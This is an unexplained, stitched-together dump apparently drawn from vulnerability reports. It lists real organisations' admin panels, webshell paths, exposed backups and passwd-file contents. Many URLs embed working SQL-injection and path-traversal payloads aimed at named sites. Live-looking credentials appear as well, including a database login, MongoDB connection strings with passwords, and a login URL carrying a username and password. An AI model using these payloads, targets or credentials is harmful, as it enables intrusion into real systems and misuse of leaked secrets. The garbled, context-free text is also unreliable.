cedhk:x:2912:80:**.**.**.**:/export/web/cedhk:/sbin/nologin chinapromotion:x:2917:80:**.**.**.**:/export/web/chinapromotion:/bin/sh chikahk:x:2918:80:**.**.**.**:/export/web/chikahk:/sbin/nologin gianna:x:2927:80:**.**.**.**:/export/web/gianna:/sbin/nologin biegoinc:x:2929:80:**.**.**.**:/export/web/biegoinc:/sbin/nologin nexsos:x:2932:80:**.**.**.**:/export/web/nexsos:/sbin/nologin pontitdg:x:2934:80:**.**.**.**:/export/web/pontitdg:/sbin/nologin gowingroup:x:2935:80:**.**.**.**:/export/web/gowingroup:/bin/sh iskydesign:x:2941:80:**.**.**.**:/export/web/iskydesign:/sbin/nologin talentfocushk:x:2942:80:**.**.**.**:/export/web/talentfocushk:/sbin/nologin taihingproducts:x:2944:80:**.**.**.**:/export/web/taihingproducts:/sbin/nologin nasonpearl:x:2946:80:**.**.**.**:/export/web/nasonpearl:/sbin/nologin miyabihk:x:2947:80:**.**.**.**:/export/web/miyabihk:/bin/sh vizzpromotion:x:2948:80:**.**.**.**:/export/web/vizzpromotion:/sbin/nologin mppromo:x:2954:80:**.**.**.**:/export/web/mppromo:/sbin/nologin nashkhk:x:2955:80:**.**.**.**:/export/web/nashkhk:/sbin/nologin phonebuytest:x:2956:80:**.**.**.**:/export/web/phonebuytest:/sbin/nologin tonwell:x:2958:80:**.**.**.**:/export/web/tonwell:/sbin/nologin rhemaengineer:x:2959:80:**.**.**.**:/export/web/rhemaengineer:/sbin/nologin shundatest01:x:2964:80:**.**.**.**:/export/web/shundatest01:/sbin/nologin pretterior:x:2965:80:**.**.**.**:/export/web/pretterior:/bin/sh pressroom01:x:2966:80:**.**.**.**:/export/web/pressroom01:/sbin/nologin tastefulbeers:x:2967:80:tastefulbeers.biz:/export/web/tastefulbeers:/sbin/nologin northwing:x:2969:80:**.**.**.**:/export/web/northwing:/sbin/nologin uarm:x:2970:80:**.**.**.**:/export/web/uarm:/sbin/nologin chunkeehk:x:2971:80:**.**.**.**:/export/web/chunkeehk:/sbin/nologin mesadahk:x:2974:80:**.**.**.**:/export/web/mesadahk:/sbin/nologin jobsasap:x:2975:80:**.**.**.**:/export/web/jobsasap:/sbin/nologin phplisttest:x:2976:80:**.**.**.**:/export/web/phplisttest:/bin/sh heltexfashion:x:2980:80:**.**.**.**:/export/web/heltexfashion:/bin/sh ambrosiacuisine:x:2982:80:**.**.**.**:/export/web/ambrosiacuisine:/bin/sh pontiwinecell:x:2984:80:**.**.**.**:/export/web/pontiwinecell:/sbin/nologin pontiwinesg:x:2985:80:**.**.**.**.sg:/export/web/pontiwinesg:/sbin/nologin hktjq:x:2989:80:**.**.**.**:/export/web/hktjq:/bin/sh http://**.**.**.**/downproject.php?u=../../configs/config.inc.php http://**.**.**.**/about.asp?id=7T5YU3R4-25YO-2CXB-N2M3-BGOD00IUPFKP http://**.**.**.**/k3cloud/ http://www.sfc.sinopec.com/ http://www.sfc.sinopec.com/image.aspx?fileid=1%27xor%28extractvalue%281,if%28ascii%28substr%28user%28%29,1,1%29%29%3E1,1,0x22%29%29%29or%271 http://**.**.**.**/login.do http://xyh.nchu.edu.cn/md.aspx?c=A1&page=3&t=0 http://180.169.84.54:7010/payment/ http://202.108.103.169:9003/weixinAdmin/loginController.do?login http://202.108.103.169:9003/weixinAdmin/webpage/system/druid/weburi.html http://home.meishichina.com/apps/163/weibo_app/ic.php?ac=login这个地方的登录位置没有登录验证限制 http://career-oj.huawei.com http://career-oj.huawei.com/exam/campusForumAction?method=bbsUserInfo&userId=114311913@qq.com http://211.154.172.113:8090/ http://211.154.172.30:8090/ http://oa.xinxindai.com/login/Login.jsp?logintype=1&languageid=7&message=120 http://1.85.2.249:89/login.do http://122.224.218.142:7070/supplier/jsp/index.jsp http://**.**.**.**/qasss/login.jsp?logout=true http://58.215.43.30/console/login/LoginForm.jsp http://**.**.**.**/query/editorder.aspx?warerequestid=60e7c5c581d87468e5e7527431*42f0ebd4930e03c6ed54f1c37a07692bfcf9a885cec4e0fa064decbae017e3dc03fa32ab807f9d7aef869f76b8328b016a547ca5b4f49e21070060999df5{}&wjid=270662 http://**.**.**.**/apply/showapplyapprove.aspx?id=3783 http://**.**.**.**/EmployAgree/BsPubDict.do?method=getPubDictJson&type=%E5%AD%A6%E5%8E%86%E4%BB%A3%E7%A0%81%E7%B1%BB%E5%88%AB&required=true(注入点) http://**.**.**.**/web.rar http://**.**.**.**/admin/admin_login.aspx http://**.**.**.**/login/adminindex.jsf http://**.**.**.** http://**.**.**.**/page.php?pkey=9 http://**.**.**.**/event_result.php?event_pkey=17 http://**.**.**/SPXzzfApp/base/spBaseXzzfOpenAction_provinceOf!toSpXzzfOpenSC.actioninfoTypeCode=1 admin.php/Index/main http://**.**.**.**/culture_list.jsp?curPage=1&MenuID=104006 http://www.risun.com/ http://im.risun.com:9901/我看了一下这个站点。 http://im.risun.com:9901/backup/1.zip http://10.11.6.206/portal_top.html http://10.11.7.54/ http://10.11.7.77/ http://10.11.7.208/ http://10.11.9.205/fax/general_setup.html?kind=item http://10.11.9.208/H28_0_0_d_net.html http://10.11.9.254/admin/index.htm http://10.11.9.254/admin/noteManage/CallNote_Detail.aspx?RecordingID=10267%27 http://**.**.**.** http://**.**.**.**/hnportal/ http://**.**.**.**/portal/site/site/portal/ha http://**.**.**.**/portalV3/site/site/portal/j http://**.**.**.**:8011 http://shop.ehuatai.com/ ip:219.141.242.77 http://shop.ehuatai.com/myname/index.jsp http://shop.ehuatai.com/myname/wooyun.jsp http://oa.cnbg.com.cn/seeyon/index.jsp http://oa.cnbg.com.cn/seeyon/management/index.jsp http://**.**.**.**/loginOutAction_userLoginOut.do http://cc.nju.edu.cn https://**.**.**.**/wind1901/KC01/blob/7ab81811ff35241049782f52391c9e3cf02cc03d/%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF.txt http://www.chanhen.com:801/ http://www.chanhen.com:801//page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://mse.tju.edu.cn/blog_program_detail.php?id=100&nid=76 http://**.**.**.**/ggdetail.aspx?id=7532 http://**.**.**.**/ggdetail.aspx?id=7532 http://hets.huatu.com http://api.jiayuan.com/level/interceptProductList.php?token=b242cad9b05795dffebf8163cf9655d6566190e1c450c8.63594016&uid=146224377&clientid=13&level_type=6&changeid=0&isJailbreak=0&page_id=234000&ver=5.6&lang=zh-Hans&channelid=006 http://222.178.225.45/ http://222.178.225.48/)的c段扫出来的 http://218.80.224.37/ http://218.80.224.37/这个站 http://**.**.**.**/bsfw/Home/Index/domain/did/0101.html http://**.**.**.**/login.asp http://chedui.cztv.tv/login.asp http://numericaltank.sjtu.edu.cn http://proposal.guohualife.com:8090/ http://proposal.guohualife.com:8091/proposalproxy/api/proposal/plan/planwebservice?WSDL http://proposal.guohualife.com:8091/proposalproxy/api/proposal/query/querywebservice?WSDL http://proposal.guohualife.com:8091/proposalproxy/api/proposal/system/systemwebservice?WSDL http://proposal.guohualife.com:8091/proposalproxy/api/proposal/customer/customerwebservice?WSDL itsm.yh.hundsun.com/yhitsm/loginAction.action http://www.itnclub.com http://oa.hundsun.com http://testpm.hundsun.com http://service.jr.hundsun.com http://service.hundsun.com http://en.hundsun.com http://service.hundsun.com http://itsm.yh.hundsun.com http://vote.hundsun.com http://vote.hundsun.com http://www.itnclub.com http://service.jr.hundsun.com http://en.hundsun.com itsm.yh.hundsun.com/yhitsm/loginAction.action命令执行 sa:qwer@asdf http://**.**.**.**/back/login.jsp http://**.**.**.** ftp://218.58.70.164/excel/ http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 http://218.26.176.181:8082/yyoa/ http://**.**.**.**/Chinese/drivers/drivers/index.php/Download/Index/model.html?id=107 http://**.**.**.**/admin.php?c=Index&a=login http://www.teachina.com/editor/xheditor/src/xheditor-zh.aspx?page=cmd http://61.184.32.10:8888/1.jsp http://60.13.152.246/ceshi/ www.pangthai.com http://liantong.cheyipai.com/Auction/List http://liantong.cheyipai.com http://218.61.5.105/ http://mathc.neu.edu.cn http://182.151.206.253/ http://**.**.**.**/View/permissionitem_list_Sort.aspx?type=dpt&dptno=63 http://**.**.**.**/View/selpermissionitem.aspx http://cme.gxwskjw.91huayi.com/report/publicedList.aspx?displayMode=1&frontForUnit=1&holdYear=2015&lowUnitCode=200001&principalName=anxtbfog&projectCode=124&projectKind=1&projectName=bcrpvkel&publicBatch=-1&subject2=01&subject3=0101 www.luolan.com http://**.**.**.**/Ashx/ResearchList1.ashx?p=&ReportCategoryID=4b88cfc1-7389-42a5-964b-4cf0899af29d&labId= http://**.**.**.**/hypage/SceneService.aspx?ListId=29E63F29C697442C9E0BC78B9125A612&SceneServiceNO=0 http://**.**.**.**/hypage/BroadcastView.aspx?infoid=ceee60d7-4f56-40ef-81bc-bfb217992e2f http://**.**.**.**/hypage/SPZNTables_hy.aspx?itemid= http://**.**.**.**/hypage/ItemSearch.aspx?SearchKey= http://**.**.**.**/hypage/ItemShowPower.aspx?itemType=xk https://hmall.huazhu.com/member_address.html?addressid=353&opt=2&back=1 http://**.**.**.**:8088/esms/login_toLogin.do http://**.**.**.**:8088/esms/bak.jsp http://hmall.huazhu.com:80/ http://**.**.**.**:7003/gjfpb/login.jsp http://thrd.cofco.com/web/device/login?lang=1 http://202.96.11.44/ http://202.96.11.44:8080/CmnoaWeb/ http://centermath.hit.edu.cn/userlogin.asp http://106.39.17.117:8088/ESSSWebII/ http://lotus.suning.com/forum.php http://www.qumaiya.com/ http://58.22.102.118:8090/ http://career.shisu.edu.cn/fr/-1?p_p_col_count=1&p_p_col_id=column-1&p_p_id=news_WAR_blossomweb_INSTANCE_wjvyKy4zT08y&p_p_lifecycle=0&p_p_mode=view&p_p_state=pop_up&_news_WAR_blossomweb_INSTANCE_wjvyKy4zT08y_action=shownewsmore&_news_WAR_blossomweb_INSTANCE_wjvyKy4zT08y_currentPage=1&_news_WAR_blossomweb_INSTANCE_wjvyKy4zT08y_nid=18050&_news_WAR_blossomweb_INSTANCE_wjvyKy4zT08y_sid=0&_news_WAR_blossomweb_INSTANCE_wjvyKy4zT08y_tid=-1 http://ttr.acfun.tv http://**.**.**.**/private/cms/zxgt/bjgg?xzqh=340000 http://**.**.**.**/private/qlqd/t_hits_qlqd/zfqdlist?xzqh=340000&type=0011&dept_code=29&site_id=0009 http://**.**.**.** http://182.151.206.253/ http://**.**.**.**/Admin/login.aspx http://**.**.**.**/web.zip http://**.**.**.**/web.zip http://124.207.74.206/redmine/login http://**.**.**.**/default/ http://**.**.**.**/index.php?m=content&c=index&a=annotation_new_window&ann_id= http://**.**.**.**/?m=content&c=index&a=card_order&card_id=19&type=1&city= http://**.**.**.**/index.php?m=insurance&c=index&a=viewpdf_post&planId=117&clauseId=23 http://180.168.34.2:8080 http://www.daoway.cn/ http://www.daoway.cn/dian/#/login商家后台地址 http://api.daoway.cn/daoway/rest/service/ea807b31d68041a2859c292c9e8594bf?&lot=111&lat=112&imei=121 http://58.22.102.44/test http://58.22.102.43/test http://58.22.102.42/test http://58.22.102.9/test http://58.22.102.42/nohup.out http://58.22.102.41/nohup.out http://58.22.102.5/nohup.out http://**.**.**.**:9983/seeyon/index.jsp http://58.248.41.170:80/uddiexplorer/SearchPublicRegistries.jsp http://58.248.41.216/uddiexplorer/SearchPublicRegistries.jsp http://58.248.41.233/uddiexplorer/SearchPublicRegistries.jsp http://58.248.41.246/uddiexplorer/SearchPublicRegistries.jsp http://125.88.6.170/uddiexplorer/SearchPublicRegistries.jsp http://125.88.6.216/uddiexplorer/SearchPublicRegistries.jsp http://**.**.**.**/ http://**.**.**.** root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin pulse:x:497:494:PulseAudio Daemon:/var/run/pulse:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbi root1:x:0:0::/home/root1:/bin/bash monitor:x:500:500::/home/monitor:/bin/bash vnstat:x:496:492:vnStat user:/var/lib/vnstat:/sbin/nologin mysql:x:501:501::/home/mysql:/bin/bash DDBQz9DlcpWJtchbb0:16528:0:99999:7 http://www.shijipay.net/ http://nissancorp.dealer.youxinpai.com http://gtmc.dealer.youxinpai.com http://jlr.dealer.youxinpai.com http://xd2sc.dealer.youxinpai.com http://ftms.dealer.youxinpai.com http://dongfeng-citroencorp.dealer.youxinpai.com http://ford.dealer.youxinpai.com http://chrysler.dealer.youxinpai.com http://ghac.dealer.youxinpai.com http://gmmc.dealer.youxinpai.com http://chery.dealer.youxinpai.com http://faw-vw.dealer.youxinpai.com http://faw-mazda.dealer.youxinpai.com http://peugeotcorp.dealer.youxinpai.com http://wdhac.dealer.youxinpai.com http://fawcar.dealer.youxinpai.com http://tubic.tju.edu.cn/zcurve/query.php?selclass=8&selfield=deebi&term=SARS http://219.143.252.247:8084/WebAppQuery.asmx http://oa.cofco-keystone.com/ http://192.168.3.43:8089/redmine/account/lost_password?token=fcc669e46ca3ff5b4e2bccc693656de2459f1410 http://219.143.252.189:8088/seeyon/index.jsp http://dmoo.cofco.com/dmoo/jsp/main.jsp https://mail.cofco-keystone.com/owa/# http://192.168.0.5:82 http://58.250.145.98:82 http://192.168.0.5:82 http://58.250.145.98:82 http://**.**.**.** http://**.**.**.**/data/AjaxService.aspx?method=selectypml&pageSize=10&pageIndex=1&n=1 http://**.**.**.**/data/AjaxService.aspx?method=lGetResultsByall2&liaoning=211100%20or%201=1&pageIndex=0&pageSize=20&sortField=&sortOrder= http://**.**.**.**/shops/newsinfo.aspx?args=abc&args1=dongji&args2=283 http://**.**.**.**/eng/special_prop/special_prop.php http://www.mei.com/)网站可重置任意用户口令。 http://www.mei.com/user/tofindPassWord。 http://cemftp.ce-air.com/yyoa/seeyonDownLoadPic?filename=../../../../../../../../../../windows/win.ini&userFileType=1 http://complaint.ce-air.com/uddiexplorer/SearchPublicRegistries.jsp http://complaint.ceair.com/uddiexplorer/SearchPublicRegistries.jsp http://complaint.ceair.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.20.35.90:8080&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%20location&btnSubmit=Search http://**.**.**.** http://**.**.**.**/database/database.mdb http://**.**.**.**/adminLogin/login.asp http://**.**.**.**/AdminLogin/PicUpload.asp http://**.**.**.**/ActicleShow.aspx?SectionId=56f313f6-1a75-4df4-9d0e-eed964132382 www.rongwm.com/search.php http://**.**.**.**/1.rar http://www.ewj.com/find_password.html http://wooyun.org/bugs/wooyun-2015-0147477 http://www.scrcoa.com//yyoa/assess/js/initDataAssess.jsp http://www.scrcoa.com/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.scrcoa.com//yyoa/createMysql.jsp http://www.scrcoa.com//yyoa/ext/createMysql.jsp http://www.scrcoa.com//yyoa/ext/trafaxserver/SystemManage/config.jsp http://www.scrcoa.com//yyoa/checkWaitdo.jsp?use http://www.scrcoa.com//yyoa/checkWaitdo.jsp?userID=1* http://220.178.6.140:8080/defaultroot/login.jsp http://220.178.6.140:8080/defaultroot/work_flow/formOptJSPUpload.jsp http://220.178.6.140:8080/defaultroot/work_flow/zhengkai.jsp http://www.dupv.com/flash_info.php?id=3168 http://jingjia.ecnu.edu.cn/sggl/wsjj/ggztDetails.jsp?WID=1 http://wap.guolian-life.com/ http://**.**.**.**/portal/login http://**.**.**.**/index.php/Information/newsDetail?type=2&id=45 http://**.**.**.** http://211.154.173.238:7007/picc/index.jspx http://211.154.173.238:7007/console https://mail.ceair.com/owa/# http://union.ceair.com/ http://b2e.ceair.com/ http://union.ceair.com/web/news/NewsInfo.aspx?nid=b0b534ca-d546-4eb2-ae8a-a425006c311d http://172.20.35.90:8080/ http://172.20.35.89:8080/ http://172.20.35.90:8080/ http://172.20.35.91:8080/ http://10.20.200.17:8080/jmx-console/ http://10.20.200.17:8080/jmx-console/ http://172.20.35.181/doc/page/main.asp http://**.**.**.**/bugs/wooyun-2015-0116152 http://**.**.**.**/bugs/wooyun-2015-0156894 http://www.teachina.com/htdocs.rar http://www.xsgzsppa.zjut.edu.cn/listarticle1.aspx?isimg=wzlosJEn&pageno=77&tid= http://www.chanhen.com:801 http://**.**.**.**/null上传的文件名.jsp http://**.**.**.**/tools/SWFUpload/upload.jsp height:20px;BORDER http://web.alltrust.com.cn:7001/ http://ku.games.renren.com/?proid=14 http://ku.games.renren.com/?proid=14 http://ku.games.renren.com/?proid=14 http://service.guobin.net:3737/index.htm http://jdkf.aisino.com/ http://60.13.152.246/ http://60.13.152.246/ceshi/ http://125.32.49.240/console/login/LoginForm.jsp http://**.**.**.**/index.php?fn=news&fn1=detail&no=285&no5=C http://***.***.***.***:****/eGov/BBS.nsf/bbadbe08be31c15648256be30009736a/afcf0d9cbfb3e3e748257f1200424b6f/$FILE/[密码:***]******.jpg;1.asa http://***.***.***.***:****/names.nsf/$users http://***.***.***.***:****/names.nsf/912366901f00a457852561c20069b844/19f1f087c38af43a48257784000d9ea0?OpenDocument http://58.215.43.130:8090/code http://bus.satrip.com/login/login.aspx http://**.**.**.**:9080/ http://**.**.**.**:9080/search.aspx?key=0&searchCondition=1&rnd=0.1638494268991053 http://**.**.**.**:8088/ http://**.**.**.**:8088 http://cw.mszq.com/portal/app/mockapp/login.jsp?lrid=1 http://cw.mszq.com/uapws/service/ http://cw.mszq.com/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl http://**.**.**.**/bugs/wooyun-2015-0146585 http://**.**.**.**/en/People/Professor/individual.php?TeacherID=T8166 http://**.**.**.** http://**.**.**.**/download.php?filename=download.php http://i.ptbus.com/findpassword i.ptbus.com/findpassword_email?email=fuck@ptbus.com&time=1449329841&key=d3d8d1b02e399c16c9df465e9dd8fdc2 http://www.tempus.cn/ http://113.105.64.204:7001/console/login/LoginForm.jsp http://**.**.**.**/ http://**.**.**.**/wwwroot.rar http://www.mogujie.com/tuan/utadmin/adminlog?adminName=&sellerName=&startDate=2013-08-25&endDate=2015-12-06&opStepMask=&opTypeMask=&bid= http://211.154.172.104:8010 http://211.154.172.104:8011 http://wendan.foxconn.com/member/login.aspx http://wendan.foxconn.com/member/GetPsw.aspx http://**.**.**.**/eproject/eproject.asp?project_id=2 http://easternmiles.ceair.com/mpf/#/sign/forget http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://oa.sfn.cn/oa/Jhsoft.Web.login/AjaxForLogin.aspx http://easternmiles.ceair.com/mpf/password/valid http://easternmiles.ceair.com http://**.**.**.**/ http://www.teupay.cn/ http://111.202.33.107:8080/mbp/login.jsp http://zone.wooyun.org/content/23905 http://www.hs-post.com/igenus/login.php http://www.hs-post.com/igenus/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpeg&cmd=form http://auto.xizi.com http://gsl.sdu.edu.cn/newuser/newuser-checkaccount.jsp?useraccount=-1 http://easternmiles.ceair.com/mpf/#/sign/signin http://i.178.com/?_action=getgamedata&_app=game&_controller=gamedata&id=1 http://bbs.onlylady.com/member.php?mod=logging&action=login&referer=http%3A%2F%2Fwww.onlylady.com%2F登录位置的验证码,好像只要不刷新页面就一直不会变 http://design.hnu.edu.cn/ http://design.hnu.edu.cn http://www.brightdairy.com:8084/ http://www.brightdairy.com/ http://cx.nju.edu.cn http://**.**.**.**:8182/uie/index.action?_domain=**.**.**.** IP:10.161.217.251 http://cstc.shutcm.edu.cn/ http://cstc.shutcm.edu.cn http://**.**.**.**/ http://**.**.**.**:8080/login.jsp https://**.**.**.**/wap/member/phoneCheckCodeSend.action?phoneNumber=手机号码 http://58.62.185.148:88/seeyon/index.jsp http://**.**.**.**/book.php?book_sn=1115 http://**.**.**.**/indexPage.action?columnId=402881ee4debedd8014debf8d0570004 http://**.**.**.**/是个政府网站,大体扫描了下,防注入做的很好,还会记录注入的类型、时间和攻击者的ip地址。 http://**.**.**.**/Shownews.php?cid=1&id=27911 mongodb://oplogger:xiaoniu2015@10.162.196.65:27017/local?authSource=admin mongodb://xiaoniu:xiaoniu2015@10.162.196.65:27017/niu http://app.cloud.niu.com/ http://zone.wooyun.org/content/23858 http://oa.lnsyy.cn http://221.8.57.106:7012/console/login/LoginForm.jsp http://221.8.57.106:7012/wooyun/shell.jsp http://www.yundaiwang.com/ http://www.yundaiwang.com/index.php?user&q=action/login http://www.yundaiwang.com/bbs/index.html?q=forums&fid=13%20ande%20aa http://www.yundaiwang.com/?user&q=action/getpwd http://manager.uts.letv.com/admin.do http://**.**.**.** http://**.**.**.**/admin/login.asp http://**.**.**.**/zxyh_show.php?id=77 http://**.**.**.**/people/bio.php?PID=16 http://m.qk365.com/admin/selfquery/consumeElectricity.jsp http://m.qk365.com/admin/selfservice/electricityRecharge.jsp http://**.**.**.**:7001/ http://**.**.**.**/page/show_news.php?id=420 https://mail.midea.com https://vpn.midea.com http://10.16.10.53 http://e.picclife.com:7006/index.jspx http://e.picclife.com:7006/console/login/LoginForm.jsp http://mobile.jxlife.com.cn/ http://mobile.jxlife.com.cn http://tsp.cpic.com.cn/ http://**.**.**.**/sitecn/aspx/bzzx.aspx?tid=1648 http://**.**.**.**/ http://**.**.**.**/login.htm http://**.**.**.**/Sites/Store/GoodsDetils.aspx?autoID=1 http://**.**.**.**/Sites/Resource/IndexList.aspx?XD=2 http://**.**.**.**/txt_more.aspx?groupID=29&&orderbyID=1&&page=1 http://**.**.**.**/District/DisDefault/NewVideo.aspx?order= http://**.**.**.**/PlatRegister/GetXN.aspx?depID= http://**.**.**.**/OA/OA_BasicManagement/SetUserDuty.aspx?dutyId= http://**.**.**.**/Public/FileDownload.aspx?fileID= http://**.**.**.**/CenterSpace/CenterSpace4YQ/VideoManagerVEdit.aspx?videoID= http://**.**.**.**/School/SchoolResouse/ResourceShow.aspx?fid=250801 http://**.**.**.**/CenterSpace/CenterSpace4LBB/Recommend_friends.aspx?num=5 http://**.**.**.**/CenterSpace/CenterSpace4DJH/ReplyList.aspx?share_id= http://**.**.**.**/ http://**.**.**.**/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1 https://**.**.**.**/index.jsp https://**.**.**.**/shell.jsp http://homs.hs.net/account/login.do http://homs.hs.net http://homs.hs.net/account/login.do http://homs.hs.net/admin/login.do http://homs.hs.net http://homs.hs.net/admin/login.do http://**.**.**.**:7080/zsj/index.htm http://www.sdjnnews.com/hgzqtz/ http://www.sdjnnews.com/lhc/ http://www.sdjnnews.com/lhckj/ http://www.sdjnnews.com/lhckjjg/ http://www.sdjnnews.com/lhd/ http://www.sdjnnews.com/lhj/ http://www.sdjnnews.com/lp/ http://www.sdjnnews.com/m88/ http://www.sdjnnews.com/hgzqw/ http://www.sdjnnews.com/hhl/ http://www.sdjnnews.com/hhs/ http://www.sdjnnews.com/hjcylc/ http://www.sdjnnews.com/hjdc/ http://www.sdjnnews.com/hlgj/ http://www.sdjnnews.com/hq/ http://www.sdjnnews.com/hygj/ http://www.sdjnnews.com/jbb/ http://www.sdjnnews.com/jkmnxy/ http://www.sdjnnews.com/jsylc/ http://www.sdjnnews.com/lb/ http://www.sdjnnews.com/lbbc/ http://www.sdjnnews.com/llxs/ http://www.fsgp.cn/ambjl/ http://www.fsgp.cn/amdc/ http://www.fsgp.cn/amwnsr/ http://www.fsgp.cn/bcw/ http://www.fsgp.cn/dbw/ http://www.zyu8.com/bocaigongsi/ http://bbs.koofang.com http://pay.guolian-life.com:7001/ http://**.**.**.**/) http://**.**.**.**/uuser/order_index?order_key=2011&order_time=&order_status=0),order_key是注入点。 http://**.**.**.**/ http://**.**.**.**/扶贫基金会weblogic存在网站序列化漏洞 http://**.**.**.**/css.jsp http://**.**.**.**/webdecl/loginAction!init.action http://**.**.**.**/ http://114.251.196.89/www/ http://**.**.**.**/xinying/chaxun/Select_name.jsp http://**.**.**.**/xinying/chaxun/Select_name.jsp http://**.**.**.**/cnchs/news_detail.php?serial=97 http://**.**.**.**/cnchs/news_detail.php?serial=97 www.wooyun.org/bugs/wooyun-2015-0145919 http://word.iciba.com/ http://word.iciba.com/?action=my http://word.iciba.com/?action=cibasns http://**.**.**.**/ER/search.jsp?the_key=China+Biography&the_field=sb&the_lang=a http://**.**.**.**/ER/search.jsp?the_key=China+Biography&the_field=sb&the_lang=a http://www.cnautotime.cn/news.php?rid=239 http://www.cnautotime.cn/news.php?rid=23039 http://bbs.360che.com/clublist.php?clubid=57&orderby=lastpost http://sqlmap.org http://**.**.**.**/HotSale/products.aspx?catno=12&subcatid=32 http://**.**.**.**/HotSale/products.aspx?catno=12&subcatid=32 http://www.monmsl.cc/zh-cn/read.jsp?id=1,如图所示: http://**.**.**.**/Cjsfw_list.php?Pid=74 http://**.**.**.**/news-detail.php?id=1000014161 http://**.**.**.**/news-detail.php?id=1000014161 http://**.**.**.**/psc/2001/update/maintain/ http://sh4g.gtja.com/portal_sh/register.jhtml http://**.**.**.**/faq_detail.html?id=18 http://**.**.**.**/faq_detail.html?id=18 http://**.**.**.**/bbs/zboard.php?id=eyes_info&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&no=44 http://**.**.**.**/bbs/zboard.php?id=eyes_info&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&no=44 http://**.**.**.**/news/?mode=data&id=126 http://**.**.**.**/news/?mode=data&id=126 http://**.**.**.**/bugs/wooyun-2015-0137850 http://**.**.**.**/show.php?id=3&newsid=1280 http://**.**.**.**/show.php?id=3&newsid=1280 http://**.**.**.**/artdecorationdetail.aspx?sguid=e6c0033100b848dd85888e5c16f40e72 http://**.**.**.**/artdecorationdetail.aspx?sguid=e6c0033100b848dd85888e5c16f40e72 http://**.**.**.**/en/news/news_detail.html?news=377 http://**.**.**.**/en/news/news_detail.html?news=377 http://**.**.**.**/Shop.aspx?shopid=15928 http://**.**.**.**/Shop.aspx?shopid=15928 http://wq.jx163.com/ http://wq.jx163.com/loginSSO.action?username=ztjxadmin&password=5D3EA3110DFC1783&url=/WEB-INF/jsp/main.jsp&reloginUrl=/WEB-INF/jsp/login.jsp http://**.**.**.**/information/index.php?parent_id=298 http://gp.webinar.foxconn.com/Index.aspx http://gp.webinar.foxconn.com/pages/registeren.aspx ns:return ns:return http://**.**.**.**/Tool/SupportTool.ashx?InitialCount=1&ID=92&Type=finance&callback=jsonp1449335506048&_=1449335507425 http://**.**.**.**/directory_user_en.php?id_key=7&eng=T http://www.mcqyy.com/RunCode/php http://www.mcqyy.com/RunCode/php5.4/ http://www.mcqyy.com/RunCode/php5.6/ http://www.mcqyy.com/RunCode/python/ http://www.mcqyy.com/RunCode/python3/ http://www.taowola.com/gift.php?type=info&id=200 http://**.**.**.**/serch/search.asp http://afis.hit.edu.cn http://www.wandahotels.com/index.php?a=show_discount&c=index&id=46&m=content http://www.wandahotels.com/index.php?a=show_discount&c=index&id=46&m=content http://gxkh.gtja.com/ http://gxkh.gtja.com/kf.asp http://gxkh.gtja.com/lccpk_detail.asp?id=188&type_id=23 http://gxkh.gtja.com/news.asp http://gxkh.gtja.com/news_detail.asp?id=176&opt=next&type_id=60 http://qiao.baidu.com/v3/?module=default&controller=index&action=doMess&siteid=5972168&page_id=&ucid=7988163 http://www.yayan.fudan.edu.cn/showArticle.php?akey= http://www.yayan.fudan.edu.cn/cuListYwArc.php?vol= http://wap.jxlife.com.cn http://www.youth.sdu.edu.cn/login.do http://www.youth.sdu.edu.cn/data.jsp http://mailbox.ycu.edu.cn/Login.asp?MailId=5 http://article.zhaopin.com/uddiexplorer/SearchPublicRegistries.jsp http://192.168.10.53:7001/uddi/uddilistener http://wooyun.org/bugs/wooyun-2010-0157542 http://campus.coolpad.com/index.php?c=submitResumes&f=saveProjectInfo http://**.**.**.** http://www.qzyy.net.cn/quality_detail.asp?id=-1 http://bjcme.91huayi.com/Page/SheetDownload.aspx?lm=1 http://**.**.**.**/seeyon/index.jsp http://**.**.**.**/seeyon/management/index.jsp http://a.ikangdental.com http://a.ikangdental.com/log http://a.ikangdental.com/log/2015-04-21.txt http://pos.manwahgroup.com/ 